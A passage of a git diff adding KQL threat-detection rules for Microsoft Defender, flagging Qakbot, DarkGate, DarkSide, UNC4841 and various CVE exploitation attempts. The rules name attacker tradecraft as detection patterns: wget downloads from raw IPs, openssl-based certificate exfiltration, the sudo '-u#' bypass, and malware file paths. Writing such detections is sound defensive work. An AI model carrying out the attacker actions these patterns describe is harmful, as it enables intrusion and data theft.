ProcessCommandLine endswith "N115" or ProcessCommandLine endswith "next" or ProcessCommandLine endswith "Nikn" or ProcessCommandLine endswith "print" or ProcessCommandLine endswith "qqqb" or ProcessCommandLine endswith "qqqq" or ProcessCommandLine endswith "RS32" or ProcessCommandLine endswith "Test" or ProcessCommandLine endswith "Time" or ProcessCommandLine endswith "Updt" or ProcessCommandLine endswith "vips" or ProcessCommandLine endswith "Wind" or ProcessCommandLine endswith "WW50" or ProcessCommandLine endswith "X555" or ProcessCommandLine endswith "XL55" or ProcessCommandLine endswith "xlAutoOpen" or ProcessCommandLine endswith "XS88") and ((ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\") and FolderPath endswith "\\rundll32.exe" and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\curl.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/qakbot_rundll32_fake_dll_extension_execution.kql b/KQL/rules-emerging-threats/Defense Evasion/qakbot_rundll32_fake_dll_extension_execution.kql new file mode 100644 index 00000000..cb3e18a8 --- /dev/null +++ b/KQL/rules-emerging-threats/Defense Evasion/qakbot_rundll32_fake_dll_extension_execution.kql @@ -0,0 +1,12 @@ +// Title: Qakbot Rundll32 Fake DLL Extension Execution +// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-24 +// Level: critical +// Description: Detects specific process tree behavior of a "rundll32" execution where the DLL doesn't have the ".dll" extension. This is often linked with potential Qakbot activity. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ((ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\") and FolderPath endswith "\\rundll32.exe" and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\curl.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe")) and (not(ProcessCommandLine contains ".dll")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/rhadamanthys_stealer_module_launch_via_rundll32_exe.kql b/KQL/rules-emerging-threats/Defense Evasion/rhadamanthys_stealer_module_launch_via_rundll32_exe.kql new file mode 100644 index 00000000..40b73934 --- /dev/null +++ b/KQL/rules-emerging-threats/Defense Evasion/rhadamanthys_stealer_module_launch_via_rundll32_exe.kql @@ -0,0 +1,10 @@ +// Title: Rhadamanthys Stealer Module Launch Via Rundll32.EXE +// Author: TropChaud +// Date: 2023-01-26 +// Level: medium +// Description: Detects the use of Rundll32 to launch an NSIS module that serves as the main stealer capability of Rhadamanthys infostealer, as observed in reports and samples in early 2023 +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011, detection.emerging-threats + +DeviceProcessEvents +| where ProcessCommandLine contains "nsis_uns" and ProcessCommandLine contains "PrintUIEntry" and (ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or FolderPath endswith "\\rundll32.exe") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/screenconnect_slashandgrab_exploitation_indicators.kql b/KQL/rules-emerging-threats/Defense Evasion/screenconnect_slashandgrab_exploitation_indicators.kql new file mode 100644 index 00000000..59bab07f --- /dev/null +++ b/KQL/rules-emerging-threats/Defense Evasion/screenconnect_slashandgrab_exploitation_indicators.kql @@ -0,0 +1,11 @@ +// Title: ScreenConnect - SlashAndGrab Exploitation Indicators +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-02-23 +// Level: high +// Description: Detects indicators of exploitation by threat actors during exploitation of the "SlashAndGrab" vulnerability related to ScreenConnect as reported Team Huntress + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, detection.emerging-threats + +DeviceFileEvents +| where (FolderPath contains "C:\\Windows\\Temp\\ScreenConnect\\" and FolderPath contains "\\LB3.exe") or (FolderPath contains "C:\\mpyutd.msi" or FolderPath contains "C:\\perflogs\\RunSchedulerTaskOnce.ps1" or FolderPath contains "C:\\ProgramData\\1.msi" or FolderPath contains "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\mpyutd.msi" or FolderPath contains "C:\\ProgramData\\update.dat" or FolderPath contains "C:\\Users\\oldadmin\\Documents\\MilsoftConnect\\Files\\ta.exe" or FolderPath contains "C:\\Windows\\Help\\Help\\SentinelAgentCore.dll" or FolderPath contains "C:\\Windows\\Help\\Help\\SentinelUI.exe" or FolderPath contains "C:\\Windows\\spsrv.exe" or FolderPath contains "C:\\Windows\\Temp\\svchost.exe") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/small_sieve_malware_file_indicator_creation.kql b/KQL/rules-emerging-threats/Defense Evasion/small_sieve_malware_file_indicator_creation.kql new file mode 100644 index 00000000..2483af37 --- /dev/null +++ b/KQL/rules-emerging-threats/Defense Evasion/small_sieve_malware_file_indicator_creation.kql @@ -0,0 +1,12 @@ +// Title: Small Sieve Malware File Indicator Creation +// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems) +// Date: 2023-05-19 +// Level: high +// Description: Detects filename indicators that contain a specific typo seen used by the Small Sieve malware. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.005, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceFileEvents +| where (FolderPath contains "Microsift" and ((FolderPath contains "\\Roaming\\" or FolderPath contains "\\Local\\") and (FolderPath contains ":\\Users\\" and FolderPath contains "\\AppData\\"))) or FolderPath endswith "\\AppData\\Local\\MicrosoftWindowsOutlookDataPlus.txt" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/sofacy_trojan_loader_activity.kql b/KQL/rules-emerging-threats/Defense Evasion/sofacy_trojan_loader_activity.kql new file mode 100644 index 00000000..6875eeb3 --- /dev/null +++ b/KQL/rules-emerging-threats/Defense Evasion/sofacy_trojan_loader_activity.kql @@ -0,0 +1,10 @@ +// Title: Sofacy Trojan Loader Activity +// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community +// Date: 2018-03-01 +// Level: high +// Description: Detects Trojan loader activity as used by APT28 +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.g0007, attack.t1059.003, attack.t1218.011, car.2013-10-002, detection.emerging-threats + +DeviceProcessEvents +| where ((ProcessCommandLine contains ".dat\"," or (ProcessCommandLine endswith ".dll #1" or ProcessCommandLine endswith ".dll\" #1" or ProcessCommandLine endswith ".dll\",#1")) and ((ProcessCommandLine contains "%LOCALAPPDATA%" or ProcessCommandLine contains "\\AppData\\Local\\") and FolderPath endswith "\\rundll32.exe")) and (not(ProcessCommandLine contains "\\AppData\\Local\\Temp\\")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/sudo_privilege_escalation_cve_2019_14287.kql b/KQL/rules-emerging-threats/Defense Evasion/sudo_privilege_escalation_cve_2019_14287.kql new file mode 100644 index 00000000..9e9357af --- /dev/null +++ b/KQL/rules-emerging-threats/Defense Evasion/sudo_privilege_escalation_cve_2019_14287.kql @@ -0,0 +1,12 @@ +// Title: Sudo Privilege Escalation CVE-2019-14287 +// Author: Florian Roth (Nextron Systems) +// Date: 2019-10-15 +// Level: high +// Description: Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287 +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1068, attack.t1548.003, cve.2019-14287, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine contains " -u#" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/suspicious_razerinstaller_explorer_subprocess.kql b/KQL/rules-emerging-threats/Defense Evasion/suspicious_razerinstaller_explorer_subprocess.kql new file mode 100644 index 00000000..0f6551fa --- /dev/null +++ b/KQL/rules-emerging-threats/Defense Evasion/suspicious_razerinstaller_explorer_subprocess.kql @@ -0,0 +1,12 @@ +// Title: Suspicious RazerInstaller Explorer Subprocess +// Author: Florian Roth (Nextron Systems), Maxime Thiebaut +// Date: 2021-08-23 +// Level: high +// Description: Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1553, detection.emerging-threats +// False Positives: +// - User selecting a different installation folder (check for other sub processes of this explorer.exe process) + +DeviceProcessEvents +| where ((ProcessIntegrityLevel in~ ("System", "S-1-16-16384")) and InitiatingProcessFolderPath endswith "\\RazerInstaller.exe") and (not(FolderPath startswith "C:\\Windows\\Installer\\Razer\\Installer\\")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/suspicious_set_value_of_msdt_in_registry_cve_2022_30190_.kql b/KQL/rules-emerging-threats/Defense Evasion/suspicious_set_value_of_msdt_in_registry_cve_2022_30190_.kql new file mode 100644 index 00000000..5624c144 --- /dev/null +++ b/KQL/rules-emerging-threats/Defense Evasion/suspicious_set_value_of_msdt_in_registry_cve_2022_30190_.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Set Value of MSDT in Registry (CVE-2022-30190) +// Author: Sittikorn S +// Date: 2020-05-31 +// Level: medium +// Description: Detects set value ms-msdt MSProtocol URI scheme in Registry that could be an attempt to exploit CVE-2022-30190. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1221, detection.emerging-threats + +DeviceRegistryEvents +| where RegistryKey =~ "HKEY_LOCAL_MACHINE\\CLASSES\\ms-msdt*" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/unc4841_download_compressed_files_from_temp_sh_using_wget.kql b/KQL/rules-emerging-threats/Defense Evasion/unc4841_download_compressed_files_from_temp_sh_using_wget.kql new file mode 100644 index 00000000..2ba11c77 --- /dev/null +++ b/KQL/rules-emerging-threats/Defense Evasion/unc4841_download_compressed_files_from_temp_sh_using_wget.kql @@ -0,0 +1,10 @@ +// Title: UNC4841 - Download Compressed Files From Temp.sh Using Wget +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-16 +// Level: high +// Description: Detects execution of "wget" to download a ".zip" or ".rar" files from "temp.sh". As seen used by UNC4841 during their Barracuda ESG zero day exploitation. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1140, detection.emerging-threats + +DeviceProcessEvents +| where ProcessCommandLine contains "https://temp.sh/" and (ProcessCommandLine endswith ".rar" or ProcessCommandLine endswith ".zip") and FolderPath endswith "/wget" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/unc4841_download_tar_file_from_untrusted_direct_ip_via_wget.kql b/KQL/rules-emerging-threats/Defense Evasion/unc4841_download_tar_file_from_untrusted_direct_ip_via_wget.kql new file mode 100644 index 00000000..efd5b053 --- /dev/null +++ b/KQL/rules-emerging-threats/Defense Evasion/unc4841_download_tar_file_from_untrusted_direct_ip_via_wget.kql @@ -0,0 +1,10 @@ +// Title: UNC4841 - Download Tar File From Untrusted Direct IP Via Wget +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-16 +// Level: high +// Description: Detects execution of "wget" to download a "tar" from an IP address that doesn't have a trusted certificate. As seen used by UNC4841 during their Barracuda ESG zero day exploitation. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1140, detection.emerging-threats + +DeviceProcessEvents +| where (ProcessCommandLine contains "--no-check-certificate" and ProcessCommandLine endswith ".tar" and ProcessCommandLine matches regex "https://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}" and FolderPath endswith "/wget") and (not((ProcessCommandLine contains "https://10." or ProcessCommandLine contains "https://192.168." or ProcessCommandLine contains "https://172.16." or ProcessCommandLine contains "https://172.17." or ProcessCommandLine contains "https://172.18." or ProcessCommandLine contains "https://172.19." or ProcessCommandLine contains "https://172.20." or ProcessCommandLine contains "https://172.21." or ProcessCommandLine contains "https://172.22." or ProcessCommandLine contains "https://172.23." or ProcessCommandLine contains "https://172.24." or ProcessCommandLine contains "https://172.25." or ProcessCommandLine contains "https://172.26." or ProcessCommandLine contains "https://172.27." or ProcessCommandLine contains "https://172.28." or ProcessCommandLine contains "https://172.29." or ProcessCommandLine contains "https://172.30." or ProcessCommandLine contains "https://172.31." or ProcessCommandLine contains "https://127." or ProcessCommandLine contains "https://169.254."))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/unc4841_ssl_certificate_exfiltration_via_openssl.kql b/KQL/rules-emerging-threats/Defense Evasion/unc4841_ssl_certificate_exfiltration_via_openssl.kql new file mode 100644 index 00000000..2e8e2ebb --- /dev/null +++ b/KQL/rules-emerging-threats/Defense Evasion/unc4841_ssl_certificate_exfiltration_via_openssl.kql @@ -0,0 +1,10 @@ +// Title: UNC4841 - SSL Certificate Exfiltration Via Openssl +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-16 +// Level: high +// Description: Detects the execution of "openssl" to connect to an IP address. This techniques was used by UNC4841 to exfiltrate SSL certificates and as a C2 channel with named pipes. Investigate commands executed in the temporal vicinity of this command. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1140, detection.emerging-threats + +DeviceProcessEvents +| where (ProcessCommandLine contains ":443" or ProcessCommandLine contains ":8080") and (ProcessCommandLine contains "s_client" and ProcessCommandLine contains "-quiet" and ProcessCommandLine contains "-connect") and ProcessCommandLine matches regex "[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}" and FolderPath endswith "/openssl" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Discovery/potential_pikabot_discovery_activity.kql b/KQL/rules-emerging-threats/Discovery/potential_pikabot_discovery_activity.kql new file mode 100644 index 00000000..a858f485 --- /dev/null +++ b/KQL/rules-emerging-threats/Discovery/potential_pikabot_discovery_activity.kql @@ -0,0 +1,14 @@ +// Title: Potential Pikabot Discovery Activity +// Author: Andreas Braathen (mnemonic.io) +// Date: 2023-10-27 +// Level: high +// Description: Detects system discovery activity carried out by Pikabot, such as incl. network, user info and domain groups. +The malware Pikabot has been seen to use this technique as part of its C2-botnet registration with a short collection time frame (less than 1 minute). + +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1016, attack.t1049, attack.t1087, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine in~ ("ipconfig.exe /all", "netstat.exe -aon", "whoami.exe /all")) and (InitiatingProcessParentFileName endswith "\\rundll32.exe" or (InitiatingProcessFolderPath endswith "\\SearchFilterHost.exe" or InitiatingProcessFolderPath endswith "\\SearchProtocolHost.exe")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/adwind_rat_jrat.kql b/KQL/rules-emerging-threats/Execution/adwind_rat_jrat.kql new file mode 100644 index 00000000..8f185e95 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/adwind_rat_jrat.kql @@ -0,0 +1,10 @@ +// Title: Adwind RAT / JRAT +// Author: Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community +// Date: 2017-11-10 +// Level: high +// Description: Detects javaw.exe in AppData folder as used by Adwind / JRAT +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.005, attack.t1059.007, detection.emerging-threats + +DeviceProcessEvents +| where (ProcessCommandLine contains "\\AppData\\Roaming\\Oracle" and ProcessCommandLine contains "\\java" and ProcessCommandLine contains ".exe ") or (ProcessCommandLine contains "cscript.exe" and ProcessCommandLine contains "Retrive" and ProcessCommandLine contains ".vbs ") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/cve_2021_1675_print_spooler_exploitation_filename_pattern.kql b/KQL/rules-emerging-threats/Execution/cve_2021_1675_print_spooler_exploitation_filename_pattern.kql new file mode 100644 index 00000000..4e802ac4 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/cve_2021_1675_print_spooler_exploitation_filename_pattern.kql @@ -0,0 +1,10 @@ +// Title: CVE-2021-1675 Print Spooler Exploitation Filename Pattern +// Author: Florian Roth (Nextron Systems) +// Date: 2021-06-29 +// Level: critical +// Description: Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675 +// MITRE Tactic: Execution +// Tags: attack.execution, attack.privilege-escalation, attack.resource-development, attack.t1587, cve.2021-1675, detection.emerging-threats + +DeviceFileEvents +| where FolderPath contains "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\1\\123" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/cve_2021_26858_exchange_exploitation.kql b/KQL/rules-emerging-threats/Execution/cve_2021_26858_exchange_exploitation.kql new file mode 100644 index 00000000..e0ff3f49 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/cve_2021_26858_exchange_exploitation.kql @@ -0,0 +1,13 @@ +// Title: CVE-2021-26858 Exchange Exploitation +// Author: Bhabesh Raj +// Date: 2021-03-03 +// Level: high +// Description: Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for +creation of non-standard files on disk by Exchange Server’s Unified Messaging service +which could indicate dropping web shells or other malicious content + +// MITRE Tactic: Execution +// Tags: attack.t1203, attack.execution, cve.2021-26858, detection.emerging-threats + +DeviceFileEvents +| where InitiatingProcessFolderPath endswith "UMWorkerProcess.exe" and (not((FolderPath endswith "CacheCleanup.bin" or FolderPath endswith ".txt" or FolderPath endswith ".LOG" or FolderPath endswith ".cfg" or FolderPath endswith "cleanup.bin"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/cve_2021_44077_poc_default_dropped_file.kql b/KQL/rules-emerging-threats/Execution/cve_2021_44077_poc_default_dropped_file.kql new file mode 100644 index 00000000..c3adf9a9 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/cve_2021_44077_poc_default_dropped_file.kql @@ -0,0 +1,12 @@ +// Title: CVE-2021-44077 POC Default Dropped File +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-06 +// Level: high +// Description: Detects the creation of "msiexec.exe" in the "bin" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section) +// MITRE Tactic: Execution +// Tags: attack.execution, cve.2021-44077, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceFileEvents +| where FolderPath endswith "\\ManageEngine\\SupportCenterPlus\\bin\\msiexec.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/cve_2022_24527_microsoft_connected_cache_lpe.kql b/KQL/rules-emerging-threats/Execution/cve_2022_24527_microsoft_connected_cache_lpe.kql new file mode 100644 index 00000000..43867a5b --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/cve_2022_24527_microsoft_connected_cache_lpe.kql @@ -0,0 +1,10 @@ +// Title: CVE-2022-24527 Microsoft Connected Cache LPE +// Author: Florian Roth (Nextron Systems) +// Date: 2022-04-13 +// Level: high +// Description: Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache +// MITRE Tactic: Execution +// Tags: attack.execution, attack.privilege-escalation, attack.t1059.001, cve.2022-24527, detection.emerging-threats + +DeviceFileEvents +| where FolderPath endswith "WindowsPowerShell\\Modules\\webAdministration\\webAdministration.psm1" and (not((RequestAccountName contains "AUTHORI" or RequestAccountName contains "AUTORI"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_linux_.kql b/KQL/rules-emerging-threats/Execution/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_linux_.kql new file mode 100644 index 00000000..f5e23c68 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_linux_.kql @@ -0,0 +1,13 @@ +// Title: CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Linux) +// Author: Andreas Braathen (mnemonic.io) +// Date: 2023-11-14 +// Level: high +// Description: Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059, attack.initial-access, attack.t1190, cve.2023-22518, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ((FolderPath endswith "/bash" or FolderPath endswith "/curl" or FolderPath endswith "/echo" or FolderPath endswith "/wget") and (InitiatingProcessCommandLine contains "confluence" and InitiatingProcessFolderPath endswith "/java")) and (not(ProcessCommandLine contains "ulimit -u")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_windows_.kql b/KQL/rules-emerging-threats/Execution/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_windows_.kql new file mode 100644 index 00000000..97fc683c --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_windows_.kql @@ -0,0 +1,11 @@ +// Title: CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Windows) +// Author: Andreas Braathen (mnemonic.io) +// Date: 2023-11-14 +// Level: medium +// Description: Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059, attack.initial-access, attack.t1190, cve.2023-22518, detection.emerging-threats + +DeviceProcessEvents +| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "PowerShell.EXE"))) and (InitiatingProcessCommandLine contains "confluence" and (InitiatingProcessFolderPath endswith "\\tomcat8.exe" or InitiatingProcessFolderPath endswith "\\tomcat9.exe" or InitiatingProcessFolderPath endswith "\\tomcat10.exe")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/cve_2023_38331_exploitation_attempt_suspicious_double_extension_file.kql b/KQL/rules-emerging-threats/Execution/cve_2023_38331_exploitation_attempt_suspicious_double_extension_file.kql new file mode 100644 index 00000000..6e14b751 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/cve_2023_38331_exploitation_attempt_suspicious_double_extension_file.kql @@ -0,0 +1,10 @@ +// Title: CVE-2023-38331 Exploitation Attempt - Suspicious Double Extension File +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-30 +// Level: high +// Description: Detects the creation of a file with a double extension and a space by WinRAR. This could be a sign of exploitation of CVE-2023-38331 +// MITRE Tactic: Execution +// Tags: attack.execution, cve.2023-38331, detection.emerging-threats + +DeviceFileEvents +| where InitiatingProcessFolderPath endswith "\\WinRAR.exe" and FolderPath contains "\\AppData\\Local\\Temp\\Rar$" and FolderPath matches regex "\\.[a-zA-Z0-9]{1,4} \\." \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/cve_2023_38331_exploitation_attempt_suspicious_winrar_child_process.kql b/KQL/rules-emerging-threats/Execution/cve_2023_38331_exploitation_attempt_suspicious_winrar_child_process.kql new file mode 100644 index 00000000..58192dc0 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/cve_2023_38331_exploitation_attempt_suspicious_winrar_child_process.kql @@ -0,0 +1,12 @@ +// Title: CVE-2023-38331 Exploitation Attempt - Suspicious WinRAR Child Process +// Author: Nasreddine Bencherchali (Nextron Systems), Andreas Braathen (mnemonic.io) +// Date: 2023-08-30 +// Level: high +// Description: Detects exploitation attempt of CVE-2023-38331 (WinRAR before v6.23), where an attacker can leverage WinRAR to execute arbitrary commands and binaries. +// MITRE Tactic: Execution +// Tags: detection.emerging-threats, attack.execution, attack.t1203, cve.2023-38331 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "cscript.exe", "PowerShell.EXE", "pwsh.dll", "wscript.exe"))) and ProcessCommandLine matches regex "\\.[a-zA-Z0-9]{1,4} \\." and ProcessCommandLine contains "\\AppData\\Local\\Temp\\Rar$" and InitiatingProcessFolderPath endswith "\\WinRAR.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/cve_2023_40477_potential_exploitation_rev_file_creation.kql b/KQL/rules-emerging-threats/Execution/cve_2023_40477_potential_exploitation_rev_file_creation.kql new file mode 100644 index 00000000..9c44e5c4 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/cve_2023_40477_potential_exploitation_rev_file_creation.kql @@ -0,0 +1,12 @@ +// Title: CVE-2023-40477 Potential Exploitation - .REV File Creation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-31 +// Level: low +// Description: Detects the creation of ".rev" files by WinRAR. Could be indicative of potential exploitation of CVE-2023-40477. Look for a suspicious execution shortly after creation or a WinRAR application crash. +// MITRE Tactic: Execution +// Tags: attack.execution, cve.2023-40477, detection.emerging-threats +// False Positives: +// - Legitimate extraction of multipart or recovery volumes ZIP files + +DeviceFileEvents +| where (InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessFolderPath endswith "\\WinRAR.exe") and FolderPath endswith ".rev" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/darkgate_autoit3_exe_execution_parameters.kql b/KQL/rules-emerging-threats/Execution/darkgate_autoit3_exe_execution_parameters.kql new file mode 100644 index 00000000..a24e7133 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/darkgate_autoit3_exe_execution_parameters.kql @@ -0,0 +1,15 @@ +// Title: DarkGate - Autoit3.EXE Execution Parameters +// Author: Micah Babinski +// Date: 2023-10-15 +// Level: high +// Description: Detects execution of the legitimate Autoit3 utility from a suspicious parent process. AutoIt3.exe is used within +the DarkGate infection chain to execute shellcode that performs process injection and connects to the DarkGate +command-and-control server. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ((InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\KeyScramblerLogon.exe" or InitiatingProcessFolderPath endswith "\\msiexec.exe") and (FolderPath endswith "\\Autoit3.exe" or ProcessVersionInfoOriginalFileName =~ "AutoIt3.exe")) and (not((FolderPath endswith ":\\Program Files (x86)\\AutoIt3\\AutoIt3.exe" or FolderPath endswith ":\\Program Files\\AutoIt3\\AutoIt3.exe"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/darkgate_drop_darkgate_loader_in_c_temp_directory.kql b/KQL/rules-emerging-threats/Execution/darkgate_drop_darkgate_loader_in_c_temp_directory.kql new file mode 100644 index 00000000..3f1f3a5c --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/darkgate_drop_darkgate_loader_in_c_temp_directory.kql @@ -0,0 +1,12 @@ +// Title: DarkGate - Drop DarkGate Loader In C:\Temp Directory +// Author: Tomasz Dyduch, Josh Nickels +// Date: 2024-05-31 +// Level: medium +// Description: Detects attackers attempting to save, decrypt and execute the DarkGate Loader in C:\temp folder. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059, detection.emerging-threats +// False Positives: +// - Unlikely legitimate usage of AutoIT in temp folders. + +DeviceFileEvents +| where (FolderPath contains ":\\temp\\" and (FolderPath endswith ".au3" or FolderPath endswith "\\autoit3.exe")) or (InitiatingProcessFolderPath contains ":\\temp\\" and (InitiatingProcessFolderPath endswith ".au3" or InitiatingProcessFolderPath endswith "\\autoit3.exe")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/darkside_ransomware_pattern.kql b/KQL/rules-emerging-threats/Execution/darkside_ransomware_pattern.kql new file mode 100644 index 00000000..06adb4ca --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/darkside_ransomware_pattern.kql @@ -0,0 +1,12 @@ +// Title: DarkSide Ransomware Pattern +// Author: Florian Roth (Nextron Systems) +// Date: 2021-05-14 +// Level: critical +// Description: Detects DarkSide Ransomware and helpers +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204, detection.emerging-threats +// False Positives: +// - UAC bypass method used by other malware + +DeviceProcessEvents +| where (ProcessCommandLine contains "=[char][byte]('0x'+" or ProcessCommandLine contains " -work worker0 -path ") or (FolderPath contains "\\AppData\\Local\\Temp\\" and InitiatingProcessCommandLine contains "DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/diamond_sleet_apt_file_creation_indicators.kql b/KQL/rules-emerging-threats/Execution/diamond_sleet_apt_file_creation_indicators.kql new file mode 100644 index 00000000..3b087bd4 --- /dev/null +++ 